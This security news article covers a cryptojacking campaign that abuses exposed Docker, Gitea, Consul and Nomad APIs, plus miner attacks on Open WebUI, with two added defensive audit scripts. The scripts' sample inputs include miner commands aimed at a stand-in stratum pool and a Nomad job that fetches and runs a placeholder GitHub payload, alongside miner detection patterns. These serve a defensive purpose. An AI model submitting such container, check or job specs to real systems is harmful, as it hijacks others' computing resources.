Cryptojacking Campaign Leverages Open-Source Tools from GitHub to Exploit DevOps APIs
Cybersecurity researchers have identified a new cryptojacking campaign targeting publicly accessible DevOps web servers associated with technologies such as Docker, Gitea, and HashiCorp Consul and Nomad, with the intention of illicitly mining cryptocurrencies. The cloud security firm Wiz has been tracking this activity under the label JINX-0132, highlighting that attackers are exploiting various known misconfigurations and vulnerabilities to deploy miner payloads.
This campaign is notable as one of the first documented cases of Nomad misconfigurations being exploited in the wild. The researchers observed that the attackers fetch the tools they need directly from public GitHub repositories rather than from infrastructure of their own, a choice that deprives defenders of attacker-controlled infrastructure to attribute.
JINX-0132 has reportedly compromised Nomad instances that manage hundreds of clients, and the combined CPU and RAM of those clients is costly to the victims: potentially tens of thousands of dollars per month. This illustrates the considerable computing power the cryptojacking operation commands.
Exploitation of the Docker API remains a well-known launchpad for such activity. Kaspersky recently reported similar targeting of misconfigured Docker API instances to conscript them into a cryptocurrency-mining botnet. An exposed Docker API lets a threat actor execute malicious code by spinning up containers that either mount the host file system or run cryptocurrency-mining images, using the standard Docker endpoints “/containers/create” and “/containers/{id}/start”.
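The paragraph above names the two endpoints an exposed daemon responds to, but does not show what a defender should look for in the container specifications that pass through them. The following script is an added example, not code from Wiz, Kaspersky or the Docker project: it audits a `/containers/create` request body or a `/containers/{id}/json` inspect document for the two traits the article describes, a bind mount of the host file system and a miner image or command. The field names follow the Docker Engine API (`Image`, `Cmd`, `HostConfig.Binds`, `HostConfig.Privileged`, `Mounts`); the miner indicator patterns and the sample inputs are constructed for this example.

```python
import re

# Indicators used by this added example (assumptions, not an official IoC list):
# names of common Monero miners and the stratum pool URL scheme they connect to.
MINER_PATTERNS = re.compile(r"xmrig|minerd|stratum\+(?:tcp|ssl)://|--donate-level", re.IGNORECASE)

# Host paths that, when bind-mounted, effectively hand the container control of the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}


def _image_and_cmd(container):
    """Return (image, [entrypoint + cmd]) from either a /containers/create request body
    or a /containers/{id}/json response; inspect output nests these under "Config"."""
    cfg = container.get("Config") or container
    cmd = cfg.get("Cmd") or []
    if isinstance(cmd, str):
        cmd = [cmd]
    entrypoint = cfg.get("Entrypoint") or []
    if isinstance(entrypoint, str):
        entrypoint = [entrypoint]
    return cfg.get("Image", ""), [*entrypoint, *cmd]


def audit_container(container):
    """Return an ordered, de-duplicated list of findings for one container document."""
    findings = []
    image, cmd = _image_and_cmd(container)
    host = container.get("HostConfig") or {}

    if host.get("Privileged"):
        findings.append("privileged container")
    if host.get("PidMode") == "host":
        findings.append("shares host PID namespace")

    # Binds are "host_path:container_path[:options]"; Mounts (inspect output) are resolved objects.
    sources = [b.split(":", 1)[0] for b in host.get("Binds") or []]
    sources += [m.get("Source", "") for m in container.get("Mounts") or [] if m.get("Type") == "bind"]
    for src in sources:
        if src in SENSITIVE_HOST_PATHS:
            findings.append(f"host path mounted: {src}")

    text = " ".join([image, *cmd])
    if MINER_PATTERNS.search(text):
        findings.append(f"miner indicator in image/command: {text}")

    return list(dict.fromkeys(findings))  # preserve order, drop duplicates


# Constructed sample inputs for this example (not real captures).
SUSPICIOUS_CREATE_BODY = {
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", "/mnt/host/tmp/xmrig -o stratum+tcp://pool.invalid:3333"],
    "HostConfig": {"Binds": ["/:/mnt/host"]},
}
BENIGN_CREATE_BODY = {
    "Image": "nginx:1.25",
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}

if __name__ == "__main__":
    for name, body in [("suspicious", SUSPICIOUS_CREATE_BODY), ("benign", BENIGN_CREATE_BODY)]:
        print(name, audit_container(body) or ["no findings"])
```

In practice the same function can be run over the output of `docker inspect` for every running container, or over create requests logged by a reverse proxy in front of the daemon socket. The more important control is upstream of this check: the daemon should not listen on a plain TCP socket reachable from the internet at all, and if remote access is required it should be limited to TLS with client certificate verification.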
Wiz indicated that the threat actors also exploit vulnerabilities or misconfigurations in Gitea, an open-source solution for hosting Git repositories. Specifically, a publicly exposed Gitea instance can be turned into remote code execution if the attacker obtains access to a user account permitted to create Git hooks, and particularly on instances running version 1.4.0 or on which the installation page has been left unlocked.
In a similar vein, HashiCorp Consul may also allow arbitrary code execution if it is not properly secured: any user with remote access to the agent can register services and define health checks for them, and a health check can consist of a bash command that the agent executes. JINX-0132 exploits exactly this capability, adding malicious checks that run mining software; the evidence takes the form of multiple services with inconspicuous names whose checks download and run the XMRig payload.
Furthermore, JINX-0132 has been observed using publicly exposed Nomad server APIs to create numerous jobs on compromised hosts, each responsible for downloading the XMRig miner payload from GitHub and executing it. The underlying weakness is Nomad's insecure default configuration, which, once the server API is exposed, permits remote code execution on the server and its connected client nodes.
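The two paragraphs above describe the same abuse in two HashiCorp products: a Consul health check or a Nomad task definition is, in effect, a command the orchestrator will run for whoever can submit it. The following script is an added example and not code from Wiz or HashiCorp; it audits a Consul service registration body (`PUT /v1/agent/service/register`, fields `Name`, `Check`/`Checks`, `Args`, the deprecated `Script`) and a Nomad job document (`POST /v1/jobs` payload or `GET /v1/job/<id>` response, fields `Job.TaskGroups[].Tasks[].Driver`, `Config`, `Artifacts[].GetterSource`) for script checks, the unsandboxed `raw_exec` driver, miner indicators and artifacts fetched from GitHub. The indicator patterns, the sample registration and the sample job are constructed for this example; the GitHub URL in the sample is a placeholder, not a real repository.

```python
import re

# Indicators used by this added example (assumptions, not an official IoC list).
MINER_PATTERNS = re.compile(r"xmrig|stratum\+(?:tcp|ssl)://|--donate-level", re.IGNORECASE)


def _miner_indicator(text):
    return bool(MINER_PATTERNS.search(text or ""))


def audit_consul_registration(body):
    """Flag script-based health checks in a Consul service registration body.
    A check with Args (or the deprecated Script field) is executed by the agent on
    the host, so whoever can register a service can run commands there."""
    findings = []
    checks = list(body.get("Checks") or [])
    if body.get("Check"):
        checks.append(body["Check"])
    for check in checks:
        args = check.get("Args")
        script = check.get("Script")
        if not (args or script):
            continue  # HTTP, TCP, TTL and gRPC checks run no command on the host
        cmd = " ".join(args) if args else script
        kind = "miner command in check" if _miner_indicator(cmd) else "script check"
        findings.append(f"service {body.get('Name')!r}: {kind}: {cmd}")
    return findings


def audit_nomad_job(job_doc):
    """Flag Nomad tasks that run directly on the client (raw_exec), carry miner
    indicators in their command line, or fetch artifacts from GitHub."""
    job = job_doc.get("Job") or job_doc
    findings = []
    for group in job.get("TaskGroups") or []:
        for task in group.get("Tasks") or []:
            label = f"job {job.get('ID')!r} task {task.get('Name')!r}"
            cfg = task.get("Config") or {}
            cmd = " ".join([str(cfg.get("command", "")), *map(str, cfg.get("args") or [])])
            if task.get("Driver") == "raw_exec":
                findings.append(f"{label}: raw_exec driver runs with the Nomad agent's privileges")
            if _miner_indicator(cmd):
                findings.append(f"{label}: miner indicator in command: {cmd}")
            for artifact in task.get("Artifacts") or []:
                src = artifact.get("GetterSource", "")
                if "github.com" in src:
                    findings.append(f"{label}: artifact downloaded from GitHub: {src}")
    return findings


# Constructed sample inputs for this example (not real captures).
CONSUL_REGISTRATION = {
    "Name": "web-metrics",
    "Port": 9100,
    "Check": {
        "Name": "metrics-health",
        "Args": ["/bin/sh", "-c", "/tmp/.cache/xmrig -o stratum+tcp://pool.invalid:3333"],
        "Interval": "30s",
    },
}
BENIGN_CONSUL_REGISTRATION = {
    "Name": "api",
    "Port": 8080,
    "Check": {"HTTP": "http://localhost:8080/health", "Interval": "10s"},
}
NOMAD_JOB = {
    "Job": {
        "ID": "sys-update",
        "TaskGroups": [{
            "Name": "update",
            "Tasks": [{
                "Name": "update",
                "Driver": "raw_exec",
                "Config": {"command": "/bin/sh", "args": ["-c", "local/bin/xmrig --donate-level 0"]},
                # placeholder URL, not a real repository
                "Artifacts": [{"GetterSource": "https://github.com/EXAMPLE-PLACEHOLDER/repo/releases/download/v1/payload.tgz",
                               "RelativeDest": "local/bin"}],
            }],
        }],
    }
}

if __name__ == "__main__":
    for line in audit_consul_registration(CONSUL_REGISTRATION) + audit_nomad_job(NOMAD_JOB):
        print(line)
```

Run over the agent's registered services and the server's job list, this gives an operator a quick inventory of every command the cluster has been told to execute. The findings only matter because the API accepted the submissions in the first place: enabling ACLs on both Consul and Nomad, leaving Consul's `enable_script_checks` off on agents reachable over the network (the `enable_local_script_checks` option limits script checks to local registrations), and not exposing either API to the internet remove the capability the campaign relies on.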
Data from Shodan reveals over 5,300 exposed Consul servers and upwards of 400 exposed Nomad servers globally, with a significant concentration in regions such as China, the United States, Germany, Singapore, Finland, the Netherlands, and the United Kingdom.
Recent disclosures from Sysdig have also detailed a malware campaign targeting Linux and Windows environments by exploiting misconfigured deployments of Open WebUI, which lets attackers upload AI-generated Python scripts that deliver cryptocurrency miners. Exposing such a system to the internet permits command execution on it, a critical weakness that attackers are actively scanning for.
Once attackers identify exposed training systems, they abuse Open WebUI Tools, a plugin system used to extend LLM capabilities, to execute malicious Python code. The script is crafted to download and run cryptocurrency miners, establish persistence, and use a Discord webhook for command-and-control. It also incorporates defense-evasion techniques, deploying libraries that conceal the mining activity on Linux systems.
On compromised Windows systems the methodology is analogous, but it additionally installs the Java Development Kit (JDK) to execute a downloaded JAR file that serves as a loader for secondary payloads. The attack culminates in the execution of files capable of stealing credentials from Discord and from cryptocurrency wallet extensions in Google Chrome.
Sysdig’s analysis indicates that more than 17,000 Open WebUI instances are accessible online, although it remains unclear how many are actually misconfigured or otherwise vulnerable. The researchers emphasize that unintentional misconfigurations exposing systems like Open WebUI to the internet pose a significant risk, particularly as attackers target both Linux and Windows environments with sophisticated infostealers and evasion techniques.